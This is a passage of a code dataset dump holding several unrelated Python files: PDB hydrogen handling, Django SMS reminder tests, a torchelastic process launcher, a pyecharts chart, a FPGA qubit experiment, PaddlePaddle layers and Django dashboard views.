pdb file:\",nr_H)\n print(\"number of truncation atoms\",(nr/2))\n print(\" number af transvered hydrogen atoms\", nr_ad)\n print(\" missing number of hydrogen atoms\", nr_H-nr_ad-int(nr/2))\n return mm3, nr_ad\n\ndef check_trunc(mm3,b_atom,xyz_p,nr):\n#check if hydrogen atom is a truncation atom\n xyz_b=[b_atom[8],b_atom[9],b_atom[10]]\n cov1=find_cov(b_atom[14])\n bond_atoms=[]\n for i in range(len(mm3)):\n for j in range(len(mm3[i])):\n cov2=find_cov(mm3[i][j][14])\n xyz_m=[mm3[i][j][8],mm3[i][j][9],mm3[i][j][10]] \n dist=CDist2(xyz_m,xyz_b)\n max_dist=cov1+cov2+0.4\n if 0.2 <= dist <= max_dist:\n bond_atoms.append(mm3[i][j])\n \n if len(bond_atoms)>= 1:\n for i in range(len(bond_atoms)):\n xyz_2=[bond_atoms[i][8],bond_atoms[i][9],bond_atoms[i][10]]\n r1=CDist2(xyz_p,xyz_b)\n r2=CDist2(xyz_p,xyz_2)\n cov3=find_cov(bond_atoms[i][14])\n cov2=find_cov(\"H\")\n max_dist1=cov1+cov2+0.4\n max_dist2=cov3+cov2+0.4\n if 0.1 <= r1 <= max_dist1 and 0.1 <= r2 <= max_dist2:\n d=d_p_to_line(xyz_p,xyz_b,xyz_2)\n if d <= 0.1:\n# print(\"b_atom \",b_atom)\n# print(\"bond_atoms[i]\",bond_atoms[i])\n nr = nr+1\n# print(\"test junc atom\")\n return True, nr\n return False, nr\n\ndef d_p_to_line(p0,p1,p2):\n## calculate distance between a point0 and a line between p1 and p2\n if (p1[0] == p2[0] and p1[1] == p2[1] and p1[2] == p2[2]):\n d=0\n else:\n if (p2[0]-p1[0] != 0):\n t=-((p1[0]-p0[0])*(p2[0]-p1[0]))/((abs(p2[0]-p1[0]))**2)\n elif (p2[1]-p1[2] != 0 ):\n t=-((p1[1]-p0[1])*(p2[1]-p1[1]))/((abs(p2[1]-p1[1]))**2)\n elif ( p2[2]-p1[2] != 0):\n t=-((p1[2]-p0[2])*(p2[2]-p1[2]))/((abs(p2[2]-p1[2]))**2)\n\n d2=((p1[0]-p0[0])+(p2[0]-p1[0])*t)**2+((p1[1]-p0[1])+(p2[1]-p1[1])*t)**2+((p1[2]-p0[2])+(p2[2]-p1[2])*t)**2\n d=d2**(0.5)\n return d\n\ndef check_ext(mm3,xyz_p, nr_ex):\n#check if atom is already in structure\n for i in range(len(mm3)):\n for j in range(len(mm3[i])):\n xyz_m=[mm3[i][j][8],mm3[i][j][9],mm3[i][j][10]]\n dist=CDist2(xyz_m,xyz_p)\n if dist<= 0.1:\n nr_ex = nr_ex +1\n# print(\"Atom already existes\")\n return True, nr_ex\n return False, nr_ex\n\ndef cov_rad():\n#list of Covalent radii in from Cambridge Structural Database\n cov_rad=[[\"H\",0.31],[\"D\",0.31],[\"C\",0.76],[\"N\",0.71],[\"O\",0.66],[\"S\",1.05],[\"Fe\",1.52],[\"CL\",1.02]]\n cov_rad.append([\"NA\",1.66])\n cov_rad.append([\"MG\",1.41])\n cov_rad.append([\"FE\",1.52])\n cov_rad.append([\"MO\",1.54])\n cov_rad.append([\"V\",1.53])\n cov_rad.append([\"P\",1.07])\n cov_rad.append([\"SE\",1.20])\n 
cov_rad.append([\"W\",1.62])\n return cov_rad\n\n\n#######################################################################################\n#processing data\nprint(mm3_input)\nprint(input_pdb)\n\norg_mm3, work_mm3, head = read_pdb(mm3_input)\nwork_pdb = read_pdb_from_mimic(input_pdb)\n\nmm3=atm_to_res(work_mm3)\nnr_ad=1\nl=0\nwhile l<=10:\n print(\"loop\", l)\n mm3, nr_ad = ad_H_no_mm3(mm3,work_pdb)\n l=l+1\n if nr_ad ==0:\n break\nprint(\"loop\",l)\nmm3 =renumber_pdb(mm3)\n\nwrite_pdb(mm3,head,out_file)\n\n\ntime_ende = time.time()\nprint(\"program ends normally after \"'{:5.3f}s'.format(time_ende-time_start),\" or \", '{:5.2f}min'.format((time_ende-time_start)/60))\n\n","sub_path":"restart_comqum_pdb.py","file_name":"restart_comqum_pdb.py","file_ext":"py","file_size_in_byte":36227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"504021260","text":"from datetime import datetime, timedelta\n\nfrom rapidsms.models import Contact\nfrom rapidsms.contrib.messagelog.models import Message\n\nfrom mwana.apps.contactsplus.models import ContactType\n\nfrom mwana.apps.smgl.tests.shared import SMGLSetUp, create_mother\nfrom mwana.apps.smgl import const\nfrom mwana.apps.smgl.reminders import (send_inactive_notice_cbas,\n send_inactive_notice_data_clerks,\n send_expected_deliveries)\n\n\nclass SMGLReminderTest(SMGLSetUp):\n fixtures = [\"initial_data.json\"]\n\n def setUp(self):\n super(SMGLReminderTest, self).setUp()\n self.createDefaults()\n self.now = datetime.utcnow().date()\n self.mom = create_mother(data={'edd': self.now + timedelta(days=5)})\n self.incharge = ContactType.objects.get(slug='incharge')\n self.anton = Contact.objects.get(name='antonOther')\n self.anton.types.add(self.incharge)\n self.anton.location = self.mom.location\n self.anton.save()\n\n def testInactiveContactReminderDataClerks(self):\n # get inbound messages for user\n da = Contact.objects.get(id=5)#5 is a data clerk\n join_msg = Message.objects.get(direction=\"I\", connection__contact=da)\n out_msgs = Message.objects.filter(direction=\"O\", connection__contact=da)\n self.assertEqual(out_msgs.count(), 1)\n # this should do nothing because it's not in range\n send_inactive_notice_data_clerks(router_obj=self.router)\n self.assertEqual(out_msgs.count(), 1)\n # set the date back so it triggers a reminder\n join_msg.date = self.now - timedelta(days=14)\n join_msg.save()\n send_inactive_notice_data_clerks(router_obj=self.router)\n out_msgs = Message.objects.filter(direction=\"O\", connection__contact=da)\n self.assertEqual(out_msgs.count(), 2)\n self.assertEqual(out_msgs[1].text, const.INACTIVE_CONTACT%{'days':14})\n\n def testExpectedEddReminder(self):\n Message.objects.all().delete()\n\n # this should send 1 msg with 1 count\n send_expected_deliveries(router_obj=self.router)\n msgs = Message.objects.all()\n self.assertEqual(msgs.count(), 1)\n self.assertEqual(msgs[0].text, const.EXPECTED_EDDS % {'edd_count': 1})\n\n def testExpectedEddReminderBeforeRange(self):\n Message.objects.all().delete()\n\n # this should send 0 as it's out of date range (less than)\n self.mom.edd = self.now - timedelta(days=1)\n self.mom.save()\n send_expected_deliveries(router_obj=self.router)\n msgs = Message.objects.all()\n self.assertEqual(msgs.count(), 0)\n\n def testExpectedEddReminderAfterRange(self):\n Message.objects.all().delete()\n\n # this should send 0 as it's out of date range (greater than)\n self.mom.edd = self.now + timedelta(days=8)\n self.mom.save()\n 
send_expected_deliveries(router_obj=self.router)\n msgs = Message.objects.all()\n self.assertEqual(msgs.count(), 0)\n\n def testExpectedEddNoInChargeReminder(self):\n Message.objects.all().delete()\n self.anton.types.clear()\n\n # this should do nothing because there's no incharge\n send_expected_deliveries(router_obj=self.router)\n self.assertEqual(Message.objects.all().count(), 0)\n","sub_path":"mwana/apps/smgl/tests/test_reminders.py","file_name":"test_reminders.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"232658870","text":"#!/usr/bin/env python3\n\n# Copyright (c) Facebook, Inc. and its affiliates.\n# All rights reserved.\n#\n# This source code is licensed under the BSD-style license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport ctypes\nimport os\nimport signal\nimport time\nfrom subprocess import CompletedProcess, TimeoutExpired\nfrom typing import Dict, List, Optional, Tuple, Union\n\nfrom torchelastic.multiprocessing.api import BaseProcessContext, ProcessGroupResult\nfrom torchelastic.multiprocessing.errors import ProcessFailure, get_error_file\nfrom torchelastic.multiprocessing.subprocess_handler import SubprocessHandler\n\n\ndef _pr_set_pdeathsig(sig=signal.SIGTERM):\n \"\"\"\n Sets PR_SET_PDEATHSIG to ensure a child process is\n terminated appropriately.\n\n See http://stackoverflow.com/questions/1884941/ for more information.\n For libc.so.6 read http://www.linux-m68k.org/faq/glibcinfo.html\n \"\"\"\n libc = ctypes.CDLL(\"libc.so.6\")\n PR_SET_PDEATHSIG = 1\n libc.prctl(PR_SET_PDEATHSIG, sig)\n\n\ndef _preexec_fn() -> None:\n _pr_set_pdeathsig()\n\n\nclass SubprocessParameters:\n \"\"\"\n Specifies parameters that are used for launching subprocesses.\n The class accepts arbitrary kwargs that will be directly passed to\n the ``subprocess.Popen`` constructor\n \"\"\"\n\n __slots__ = (\"args\", \"stdout\", \"stderr\", \"start_args\")\n\n def __init__(\n self,\n args: Tuple,\n stdout: Union[int, str, None] = None,\n stderr: Union[int, str, None] = None,\n **start_kwargs,\n ):\n r\"\"\"\n\n Arguments:\n args (Tuple[str]): Arguments that are used to launch the process\n stdout (Union[int, str, None]) The destination of the stdout stream. It can have one\n of three types: None - the default output, int - the fd destination, which also\n can be a special use case, e.g. subprocess.PIPE, str - the directory destination.\n If the value is str, the process will write the output into: {stdout}/{rank}/stdout.log\n stderr (Union[int, str, None]) The destination of the stderr stream. It can have one\n of three types: None - the default output, int - the fd destination, which also\n can be a special use case, e.g. subprocess.PIPE, str - the directory destination.\n If the value is str, the process will write the output into: {stdout}/{rank}/stderr.log\n \"\"\"\n self.args = args\n self.stdout = stdout\n self.stderr = stderr\n self.start_args = {}\n for (key, val) in start_kwargs.items():\n self.start_args[key] = val\n\n\nclass SubprocessContext(BaseProcessContext):\n \"\"\"\n Combines common operations that are executed on the same process group.\n \"\"\"\n\n def __init__(self, proc_list: List[SubprocessHandler], run_id: int = 0):\n self.processes = proc_list\n self.run_id = run_id\n\n def wait(self, timeout: Optional[float] = None) -> Optional[ProcessGroupResult]:\n r\"\"\"\n Method waits for process group completion in a loop. 
If all processes succeeded, the list of\n        ``subprocess.CompletedProcess`` objects will be returned. If processes are still running, the method\n        will return None.\n        If any process failed, the failure that was recorded first is returned in the ``ProcessGroupResult``.\n        \"\"\"\n        deadline, period = self._get_deadline_and_period(timeout)\n        while deadline > time.time():\n            if not self._any_alive():\n                break\n            failed_result = self._try_wait_or_get_result()\n            if failed_result:\n                self.terminate()\n                return ProcessGroupResult(failure=failed_result)\n            time.sleep(period)\n\n        if self._any_alive():\n            return None\n        failed_result = self._try_wait_or_get_result()\n        if failed_result:\n            return ProcessGroupResult(failure=failed_result)\n        results = {}\n        for idx, proc in enumerate(self.processes):\n            results[idx] = CompletedProcess(\n                args=proc.args,\n                returncode=proc.returncode,\n                stdout=proc.stdout,\n                stderr=proc.stderr,\n            )\n        return ProcessGroupResult(return_values=results)\n\n    def pids(self) -> List[int]:\n        return [int(proc.pid) for proc in self.processes]\n\n    def _any_alive(self) -> bool:\n        for proc in self.processes:\n            if proc.is_alive():\n                return True\n        return False\n\n    def _try_wait_or_get_result(self, timeout: float = 1.0) -> Optional[ProcessFailure]:\n        failed_result = None\n        for proc in self.processes:\n            try:\n                proc_failed_result = proc.wait_with_return(timeout, self.run_id)\n            except TimeoutExpired:\n                continue\n            if not proc_failed_result:\n                continue\n            if (\n                failed_result is None\n                or failed_result.timestamp > proc_failed_result.timestamp\n            ):\n                failed_result = proc_failed_result\n        return failed_result\n\n    def terminate(self) -> None:\n        for proc in self.processes:\n            if proc.is_alive():\n                proc.terminate()\n                proc.wait()\n\n\ndef _resolve_std_stream(stream: Union[str, int, None], type: str, rank: int):\n    if stream is None:\n        return None\n    elif isinstance(stream, int):\n        return stream\n    else:\n        path = f\"{rank}/{type}.log\"\n        stream_file = os.path.join(stream, path)\n        stream_dir = stream_file[0 : stream_file.rfind(os.path.sep)]\n        os.makedirs(stream_dir, exist_ok=True)\n        return open(stream_file, \"w\")\n\n\ndef start_processes(\n    params: List[SubprocessParameters], run_id: int = 0\n) -> SubprocessContext:\n    processes = []\n    for local_rank, proc_params in enumerate(params):\n        stdout_stream = _resolve_std_stream(proc_params.stdout, \"stdout\", local_rank)\n        stderr_stream = _resolve_std_stream(proc_params.stderr, \"stderr\", local_rank)\n        popen_args = proc_params.start_args\n        proc_args = {\n            \"args\": proc_params.args,\n            \"preexec_fn\": _preexec_fn,\n            \"stdout\": stdout_stream,\n            \"stderr\": stderr_stream,\n        }\n        popen_args.update(proc_args)\n        if \"env\" not in popen_args:\n            popen_args[\"env\"] = {}\n        popen_args[\"env\"][\"TORCHELASTIC_ERROR_FILE\"] = get_error_file(\n            local_rank, run_id\n        )\n        process = SubprocessHandler(local_rank, **popen_args)\n        processes.append(process)\n    return SubprocessContext(processes, run_id)\n","sub_path":"torchelastic/multiprocessing/sp.py","file_name":"sp.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"172900086","text":"#encoding:utf-8\r\nimport random\r\nfrom pyecharts import Bar\r\nfrom pymongo import MongoClient\r\n\r\n\r\nconn = MongoClient('127.0.0.1',27017) # create the connection to MongoDB\r\ndb = conn.anjuke # select the database\r\ncollection=db.AnjukeItem # select the collection in the database\r\nall = []\r\nres = collection.aggregate([\r\n    {'$group':{'_id':'$city',\r\n               'count':{'$sum':1}}},\r\n    {'$sort':{'count':-1}},])\r\nconn.close()\r\n
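The `$group`/`$sort` pipeline above computes per-city listing counts in descending order. For a small collection the same numbers can be cross-checked client-side; a sketch, assuming every document carries a `city` field and the collection fits in memory. (Note also that calling `conn.close()` before iterating `res` only works because a result set this small is returned in the cursor's first batch; for larger results, close the client after consuming the cursor.)

```python
# Client-side equivalent of the $group/$sort pipeline, for cross-checking.
from collections import Counter

counts = Counter(doc['city'] for doc in collection.find({}, {'city': 1, '_id': 0}))
expected = [{'_id': city, 'count': n} for city, n in counts.most_common()]
```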
# The aggregate() call above is a MongoDB aggregation query\r\n# $group: groups the results by the given expression; the _id field says which field to group on, so '$city' here means grouping by the city field\r\n# The count field's value, '$sum': 1, adds the given value (1 in this example) for every document in a group, so the result is simply the size of each group\r\n# $sort: sorts the results by the given field, i.e. by the computed count; -1 means descending order\r\n\r\nfor i in res:\r\n    print(i)\r\n    #{'_id': '成都', 'count': 2074}\r\n    all.append((i['_id'].strip(),i['count']))\r\n\r\nattr = [i[0] for i in all[:30] ] # names of the top 30 cities\r\nv1 = [i[1] for i in all[:30]] # counts for the top 30 cities\r\nprint(attr)\r\nbar = Bar('新房分布柱状图') # bar chart of the distribution of new homes\r\nbar.add('各城市新楼盘数',attr,v1,is_label_show=True,is_datazoom_show=True,xaxis_rotate=65, label_color=['#87CEEB',])\r\n#attr: the city names along the x axis\r\n#v1: the values\r\n#is_label_show -> bool: whether to show the labels (the number on each bar); hidden by default\r\n#is_datazoom_show -> bool: whether to use the data-zoom component; False by default\r\n#xaxis_rotate -> int: rotation angle of the x-axis tick labels; 0 (no rotation) by default, ranging from -90 to 90 degrees\r\n#label_color: the colour of the bars\r\nbar.render('bar.html')\r\n","sub_path":"anjuke-paint/bar1.py","file_name":"bar1.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"594336212","text":"#!/usr/bin/env python\n\nimport re\nimport ast\nfrom setuptools import setup\n\n_version_re = re.compile(r'__version__\\s+=\\s+(.*)')\n\nwith open('shellwhat/__init__.py', 'rb') as f:\n    version = str(ast.literal_eval(_version_re.search(\n        f.read().decode('utf-8')).group(1)))\n\nsetup(\n\tname='shellwhat',\n\tversion=version,\n\tpackages=['shellwhat'],\n\tinstall_requires=['protowhat>=0.5.0'],\n    description = 'Submission correctness tests for shell languages',\n    author = 'Michael Chow',\n    author_email = 'michael@datacamp.com',\n    url = 'https://github.com/datacamp/shellwhat')\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"377417887","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 22 13:37:53 2021\n\n@author: qulab\n\"\"\"\nfrom init_script import *\nimport numpy as np\n\nclass state_prep_fock_reward_fpga(FPGAExperiment):\n    \"\"\" State preparation with Fock reward.\"\"\"\n    loop_delay = FloatParameter(4e6)\n    batch_size = IntParameter(10)\n    opt_file = StringParameter('')\n    fock = IntParameter(4)\n\n    def sequence(self):\n        # load optimized pulse sequences from file\n        params = np.load(self.opt_file, allow_pickle=True)\n        self.qubit_pulses = [(p.real, p.imag) for p in params['qubit_pulses']]\n        self.cavity_pulses = [(p.real, p.imag) for p in params['cavity_pulses']]\n\n        detune = - self.fock * cavity.chi\n        self.qubit = qubit_ef\n\n        @subroutine\n        def reward_circuit():\n            readout(m1='se')\n            sync()\n            self.qubit.flip(selective=True, detune=detune)\n            sync()\n            readout(m2='se')\n            delay(self.loop_delay)\n\n        @subroutine\n        def init_circuit():\n            readout(m0='se')\n\n        def control_circuit(i):\n            sync()\n            qubit.array_pulse(*self.qubit_pulses[i])\n            cavity.array_pulse(*self.cavity_pulses[i])\n            sync()\n\n        for i in range(self.batch_size):\n            # initialize, run control circuit and collect reward\n            init_circuit()\n            control_circuit(i)\n            reward_circuit()\n","sub_path":"rl/state_prep_fock_reward_fpga.py","file_name":"state_prep_fock_reward_fpga.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"638533408","text":"# Copyright (c) 2018 PaddlePaddle Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nfrom six.moves import reduce\n\nfrom .. import core\nfrom ..layers import utils\nfrom . import layers\nfrom ..framework import Variable, OpProtoHolder\nfrom ..param_attr import ParamAttr\nfrom ..initializer import Normal, Constant\n\n__all__ = [\n 'Conv2D',\n 'Pool2D',\n 'FC',\n]\n\n\nclass Conv2D(layers.Layer):\n def __init__(self,\n num_channels,\n num_filters,\n filter_size,\n stride=1,\n padding=0,\n dilation=1,\n groups=None,\n use_cudnn=True,\n act=None,\n param_attr=None,\n bias_attr=None,\n name=None,\n dtype=core.VarDesc.VarType.FP32):\n assert param_attr is not False, \"param_attr should not be False here.\"\n super(Conv2D, self).__init__(name=name, dtype=dtype)\n\n from ..layer_helper import LayerHelper\n self._helper = LayerHelper(\n type(self).__name__,\n param_attr=param_attr,\n bias_attr=bias_attr,\n dtype=dtype,\n name=name)\n\n self._groups = groups\n self._stride = utils.convert_to_list(stride, 2, 'stride')\n self._padding = utils.convert_to_list(padding, 2, 'padding')\n self._dilation = utils.convert_to_list(dilation, 2, 'dilation')\n if not isinstance(use_cudnn, bool):\n raise ValueError(\"use_cudnn should be True or False\")\n self._use_cudnn = use_cudnn\n self._num_channels = num_channels\n if (self._num_channels == self._groups and\n num_filters % self._num_channels == 0 and not self._use_cudnn):\n self._l_type = 'depthwise_conv2d'\n else:\n self._l_type = 'conv2d'\n\n if groups is None:\n num_filter_channels = num_channels\n else:\n if num_channels % groups != 0:\n raise ValueError(\"num_channels must be divisible by groups.\")\n num_filter_channels = num_channels // groups\n filter_size = utils.convert_to_list(filter_size, 2, 'filter_size')\n filter_shape = [num_filters, int(num_filter_channels)] + filter_size\n\n def _get_default_param_initializer():\n filter_elem_num = filter_size[0] * filter_size[1] * num_channels\n std = (2.0 / filter_elem_num)**0.5\n return Normal(0.0, std, 0)\n\n self._filter_param = self._helper.create_parameter(\n attr=self._helper.param_attr,\n shape=filter_shape,\n dtype=self._dtype,\n default_initializer=_get_default_param_initializer())\n\n if self._use_cudnn:\n self._helper.create_variable(\n name=\"kCUDNNFwdAlgoCache\",\n persistable=True,\n type=core.VarDesc.VarType.RAW)\n self._helper.create_variable(\n name=\"kCUDNNBwdDataAlgoCache\",\n persistable=True,\n type=core.VarDesc.VarType.RAW)\n self._helper.create_variable(\n name=\"kCUDNNBwdFilterAlgoCache\",\n persistable=True,\n type=core.VarDesc.VarType.RAW)\n\n self._bias_param = self._helper.create_parameter(\n attr=self._helper.bias_attr,\n shape=[num_filters],\n dtype=self._dtype,\n is_bias=True)\n\n def forward(self, input):\n pre_bias = self._helper.create_variable_for_type_inference(\n dtype=self._dtype)\n\n self._helper.append_op(\n type=self._l_type,\n inputs={\n 'Input': input,\n 'Filter': self._filter_param,\n },\n outputs={\"Output\": pre_bias},\n attrs={\n 
'strides': self._stride,\n 'paddings': self._padding,\n 'dilations': self._dilation,\n 'groups': self._groups,\n 'use_cudnn': self._use_cudnn,\n 'use_mkldnn': False,\n })\n\n pre_act = self._helper.create_variable_for_type_inference(\n dtype=self._dtype)\n\n self._helper.append_op(\n type='elementwise_add',\n inputs={'X': [pre_bias],\n 'Y': [self._bias_param]},\n outputs={'Out': [pre_act]},\n attrs={'axis': 1})\n\n return self._helper.append_activation(pre_act)\n\n\nclass Pool2D(layers.Layer):\n def __init__(self,\n pool_size=-1,\n pool_type=\"max\",\n pool_stride=1,\n pool_padding=0,\n global_pooling=False,\n use_cudnn=True,\n ceil_mode=False,\n exclusive=True,\n name=None,\n dtype=core.VarDesc.VarType.FP32):\n if pool_type not in [\"max\", \"avg\"]:\n raise ValueError(\n \"Unknown pool_type: '%s'. It can only be 'max' or 'avg'.\",\n str(pool_type))\n\n if global_pooling is False and pool_size == -1:\n raise ValueError(\n \"When the global_pooling is False, pool_size must be passed \"\n \"and be a valid value. Received pool_size: \" + str(pool_size))\n\n if not isinstance(use_cudnn, bool):\n raise ValueError(\"use_cudnn should be True or False\")\n\n super(Pool2D, self).__init__(name=name, dtype=dtype)\n\n from ..layer_helper import LayerHelper\n self._helper = LayerHelper(type(self).__name__, dtype=dtype, name=name)\n\n self._pool_type = pool_type\n self._pool_size = utils.convert_to_list(pool_size, 2, 'pool_size')\n self._pool_padding = utils.convert_to_list(pool_padding, 2,\n 'pool_padding')\n self._pool_stride = utils.convert_to_list(pool_stride, 2, 'pool_stride')\n self._global_pooling = global_pooling\n self._use_cudnn = use_cudnn\n self._ceil_mode = ceil_mode\n self._exclusive = exclusive\n self._l_type = 'pool2d'\n\n def forward(self, input):\n pool_out = self._helper.create_variable_for_type_inference(self._dtype)\n\n self._helper.append_op(\n type=self._l_type,\n inputs={\"X\": input},\n outputs={\"Out\": pool_out},\n attrs={\n \"pooling_type\": self._pool_type,\n \"ksize\": self._pool_size,\n \"global_pooling\": self._global_pooling,\n \"strides\": self._pool_stride,\n \"paddings\": self._pool_padding,\n \"use_cudnn\": self._use_cudnn,\n \"ceil_mode\": self._ceil_mode,\n \"use_mkldnn\": False,\n \"exclusive\": self._exclusive,\n })\n return pool_out\n\n\nclass FC(layers.Layer):\n def __init__(self,\n size,\n param_attr=None,\n num_flatten_dims=1,\n dtype=core.VarDesc.VarType.FP32):\n super(FC, self).__init__()\n self._size = size\n self._num_flatten_dims = num_flatten_dims\n self._dtype = dtype\n from ..layer_helper import LayerHelper\n self._helper = LayerHelper('FC', param_attr=param_attr)\n\n def _build_once(self, input):\n input_shape = input.shape\n param_shape = [\n reduce(lambda a, b: a * b, input_shape[self._num_flatten_dims:], 1)\n ] + [self._size]\n self._w = self._helper.create_parameter(\n attr=self._helper.param_attr,\n shape=param_shape,\n dtype=self._dtype,\n is_bias=False)\n\n def forward(self, input):\n tmp = self._helper.create_variable_for_type_inference(self._dtype)\n self._helper.append_op(\n type=\"mul\",\n inputs={\"X\": input,\n \"Y\": self._w},\n outputs={\"Out\": tmp},\n attrs={\n \"x_num_col_dims\": self._num_flatten_dims,\n \"y_num_col_dims\": 1\n })\n\n out = self._helper.create_variable_for_type_inference(self._dtype)\n self._helper.append_op(\n type=\"sum\",\n inputs={\"X\": [tmp]},\n outputs={\"Out\": out},\n attrs={\"use_mkldnn\": False})\n return 
out\n","sub_path":"python/paddle/fluid/imperative/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":8856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"350072831","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.http import HttpResponseRedirect, HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom .models import *\nfrom datetime import date\nfrom django.db.models import Sum, Avg, Count\nfrom collections import Counter\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.decorators import login_required\nimport json, datetime\nimport operator # aj added\n\n\n@login_required(login_url='/login')\ndef dashboard(request):\n today = date.today()\n all_notes = Note.objects.order_by('-id')[:5]\n all_orders = CustomerOrder.objects.all()\n all_orders_short = CustomerOrder.objects.all()[:15]\n active_orders = CustomerOrder.objects.filter(delivery_date__gte=today)\n num_active_orders = len(active_orders)\n sum_price = CustomerOrder.objects.filter(delivery_date__gte=today).aggregate(Sum('total_price'))\n avg_price = CustomerOrder.objects.all().aggregate(Avg('total_price'))\n \n active_orders_oc = CustomerOrder.objects.filter(shipping_method__contains=\"OC\").filter(delivery_date__gte=today)\n num_active_orders_oc = len(active_orders_oc)\n sum_price_oc = CustomerOrder.objects.filter(delivery_date__gte=today).filter(shipping_method__contains=\"OC\").aggregate(Sum('total_price'))\n avg_price_oc = CustomerOrder.objects.all().filter(delivery_date__gte=today).filter(shipping_method__contains=\"OC\").aggregate(Avg('total_price'))\n \n active_orders_la = CustomerOrder.objects.filter(shipping_method__contains=\"LA\").filter(delivery_date__gte=today)\n num_active_orders_la = len(active_orders_la)\n sum_price_la = CustomerOrder.objects.filter(delivery_date__gte=today).filter(shipping_method__contains=\"LA\").aggregate(Sum('total_price'))\n avg_price_la = CustomerOrder.objects.filter(delivery_date__gte=today).filter(shipping_method__contains=\"LA\").aggregate(Avg('total_price'))\n \n bestseller = Product.objects.all().order_by('quantity').last()\n worstseller = Product.objects.all().order_by('-quantity').last()\n bestseller_n = {'best_name': bestseller.name} \n \n allp = Product.objects.all()\n allp_count = allp.count()\n allpu = Product.objects.all().annotate(Count('pk'))\n \n \n dist_products = Product.objects.values('name').distinct()\n # dist_product_qty = Product.objects.filter(name__contains=\"Ham & Cheese Omelette w/ Farro Salad\").aggregate(Sum('quantity'))\n \n # create an empty dictionary\n best_sellers = {} \n # for loop, prod is line variable, dist_products is from above variable dist_products = Products.objects.values('name').distinct()\n for prod in dist_products: \n # for each loop, sum the quantity of the name of each line (prod)\n quantity = Product.objects.filter(name__contains=prod['name']).aggregate(Sum('quantity')) \n # add product name as key and sum of quantity of product as value to dictionary \"best_sellers\"\n best_sellers[prod['name']] = quantity['quantity__sum'] \n\n # set variable sorted_sellers to best_seller.... 
\n sorted_sellers = sorted(best_sellers.items(), key=operator.itemgetter(1))\n sorted_sellers.reverse() # aj added\n \n worst_sellers = {}\n for prod1 in dist_products:\n quantity1 = Product.objects.filter(name__contains=prod1['name']).aggregate(Sum('quantity'))\n worst_sellers[prod1['name']] = quantity1['quantity__sum']\n sorted_worst_sellers = sorted(worst_sellers.items(), key=operator.itemgetter(1))\n sorted_worst_sellers\n \n best_seller1 = Product.objects.values('name').annotate(total=Count('quantity')).order_by('-total')\n worst_seller1 = Product.objects.values('name').annotate(total=Count('quantity')).order_by('total')\n \n best_seller_5 = Product.objects.values('name').annotate(total=Count('quantity')).order_by('-total')\n \n beginning = datetime.date(2017,6,10)\n end = datetime.date(2017,6,17)\n product_date = Product.objects.filter(customer_order__delivery_date__gte=beginning,customer_order__delivery_date__lte=end).values('name').annotate(total=Sum('quantity')).order_by('-total')\n \n \n \n context = {\n \"all_notes\":all_notes, \n \"all_orders\":all_orders, \n \"today\":today,\n \"active_orders\":active_orders,\n \"num_active_orders\":num_active_orders,\n \"sum_price\":sum_price,\n \"avg_price\":avg_price,\n \"active_orders_oc\":active_orders_oc,\n \"num_active_orders_oc\":num_active_orders_oc,\n \"sum_price_oc\":sum_price_oc,\n \"active_orders_la\":active_orders_la,\n \"num_active_orders_la\":num_active_orders_la,\n \"avg_price_oc\":avg_price_oc,\n \"sum_price_la\":sum_price_la,\n \"avg_price_la\":avg_price_la,\n \"bestseller_n\":bestseller_n,\n \"bestseller\":bestseller,\n \"worstseller\":worstseller,\n \"all_orders_short\":all_orders_short,\n \"allp_count\":allp_count,\n \"allpu\":allpu,\n \"dist_products\":dist_products,\n \"quantity\":quantity,\n \"items\": Product.objects.values('name').distinct(),\n \"best_sellers\":best_sellers,\n \"sorted_sellers\": sorted_sellers, # aj added\n \"best_seller1\":best_seller1,\n \"worst_seller1\":worst_seller1,\n \"worst_sellers\":worst_sellers,\n \"sorted_worst_sellers\":sorted_worst_sellers,\n \"best_seller_5\":best_seller_5,\n \"product_date\":product_date,\n \"beginning\":beginning,\n \"end\":end,\n \n\n }\n \n return render(request, \"orderdisplay/dashboard.html\", context)\n\ndef best_seller(request):\n\n all_products = Product.objects.all()\n all_products_5 = Product.objects.all()[:5]\n all_products_distinct = Product.objects.values('name').distinct()\n \n \n context = {\n \"all_products\":all_products,\n \"items\":Product.objects.values('name').distinct(),\n \"best_seller\":best_seller,\n \"all_products_5\":all_products_5,\n \"all_products_distinct\":all_products_distinct,\n \"best_seller\":best_seller,\n \n }\n return render(request, \"orderdisplay/best_seller.html\", context)\n \n\ndef features(request):\n context = { }\n return render(request, \"orderdisplay/features.html\", context)\n\ndef features2(request):\n context = { }\n return render(request, \"orderdisplay/features2.html\", context)\n \ndef live_orders(request):\n context = { }\n return render(request, \"orderdisplay/live_orders.html\", context)\n\ndef 